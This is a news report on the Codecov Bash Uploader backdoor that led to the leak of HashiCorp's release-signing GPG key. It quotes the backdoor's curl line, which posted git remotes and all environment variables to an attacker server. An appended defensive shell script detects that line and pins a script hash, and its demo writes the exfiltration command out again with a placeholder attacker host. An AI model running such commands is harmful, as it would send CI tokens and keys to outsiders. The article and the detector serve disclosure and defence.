Injection of malicious code into the Codecov script led to the compromise of HashiCorp's PGP key.

HashiCorp, known for developing the open-source tools Vagrant, Packer, Nomad and Terraform, has announced the leak of the private GPG key used to create the digital signatures that verify its releases. Attackers who obtained the GPG key could make hidden changes to HashiCorp products and certify them with a valid digital signature. At the same time, the company stated that its audit identified no such tampering attempts.

The compromised GPG key has since been revoked and a new key has been introduced in its place. The problem affected only verification using the SHA256SUM and SHA256SUM.sig files; it did not affect the generation of digital signatures for the Linux DEB and RPM packages distributed through releases.hashicorp.com, nor the release verification mechanisms for macOS and Windows (AuthentiCode).

The leak was caused by the use of the Codecov Bash Uploader script (codecov-bash) in HashiCorp's infrastructure; the script is designed to upload code-coverage reports from continuous integration systems. During the attack on the Codecov company, a backdoor was hidden in that script, through which passwords and encryption keys were sent to a server controlled by the attackers.

To break in, the attackers exploited a mistake in the way the Codecov Docker image was built, which allowed them to extract the GCS (Google Cloud Storage) access credentials needed to modify the Bash Uploader script distributed from the codecov.io website. The changes were made on January 31, remained undetected for two months, and allowed the attackers to extract information stored in customers' continuous integration environments. Using the added malicious code, the attackers could obtain information about the Git repository under test and all of its environment variables, including the tokens, encryption keys and passwords passed to continuous integration systems to grant access to code, repositories and services such as Amazon Web Services and GitHub.

In addition to direct invocation, the Codecov Bash Uploader script was used as a component of other uploaders, such as Codecov-action (GitHub), Codecov-circleci-orb and Codecov-bitrise-step, whose users are also affected by the problem. All users of codecov-bash and the related products are advised to audit their infrastructure and to rotate passwords and encryption keys. The presence of the backdoor in the script can be checked by looking for the line curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /upload/v2 || true
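The check described above, as an added example that is not part of the original article and not code from Codecov or HashiCorp: a small POSIX shell helper that scans a locally downloaded copy of a CI helper script for the exfiltration indicator quoted in the article, applies a broader heuristic for any curl/wget call that ships the environment or git remotes off-host, and compares the script's SHA-256 against a value pinned in advance so that a silently modified download is refused before it runs. The sample scripts, the pinned hash and the placeholder host ATTACKER_HOST are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the article, Codecov or HashiCorp): detect the
# codecov-bash backdoor indicator and pin a CI script's hash before use.

# Exact indicator fragment from the backdoored script (attacker host omitted,
# as in the article).
CODECOV_IOC='<<<<<< ENV $(env)'

# hash_file FILE -> prints the SHA-256 of FILE (sha256sum, or shasum on macOS).
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# scan_for_backdoor FILE -> 0 if FILE looks clean, 1 if it carries the
# known indicator or a curl/wget call that exfiltrates env or git remotes.
scan_for_backdoor() {
    if grep -Fq "$CODECOV_IOC" "$1"; then
        echo "known codecov-bash indicator found in $1" >&2
        return 1
    fi
    if grep -Eq '(curl|wget).*\$\((env|git remote)' "$1"; then
        echo "suspicious env/git-remote upload in $1" >&2
        return 1
    fi
    return 0
}

# verify_pinned FILE EXPECTED_SHA256 -> 0 only if the file matches the pin.
verify_pinned() {
    [ "$(hash_file "$1")" = "$2" ]
}

# check_script FILE EXPECTED_SHA256 -> 0 only if FILE is both pinned and clean.
check_script() {
    verify_pinned "$1" "$2" && scan_for_backdoor "$1"
}

# Stand-alone demonstration on two constructed scripts in a temp directory.
demo() {
    dir=$(mktemp -d)
    printf '#!/bin/bash\necho "uploading coverage report"\n' > "$dir/clean.sh"
    # Constructed copy of the backdoor line with a placeholder host.
    printf '#!/bin/bash\ncurl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://ATTACKER_HOST/upload/v2 || true\n' > "$dir/bad.sh"
    pin=$(hash_file "$dir/clean.sh")   # a pin recorded on a known-good copy
    check_script "$dir/clean.sh" "$pin" && echo "clean.sh: OK"
    check_script "$dir/bad.sh" "$pin" || echo "bad.sh: REJECTED"
    rm -rf "$dir"
}

demo
```

In a pipeline the pin would be the hash recorded when the script was last reviewed, and the heuristic grep is deliberately broad: a legitimate uploader has no reason to send the full output of env or git remote -v to a remote host, so a hit is worth a manual look even when the exact indicator is absent.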

Source: opennet.ru
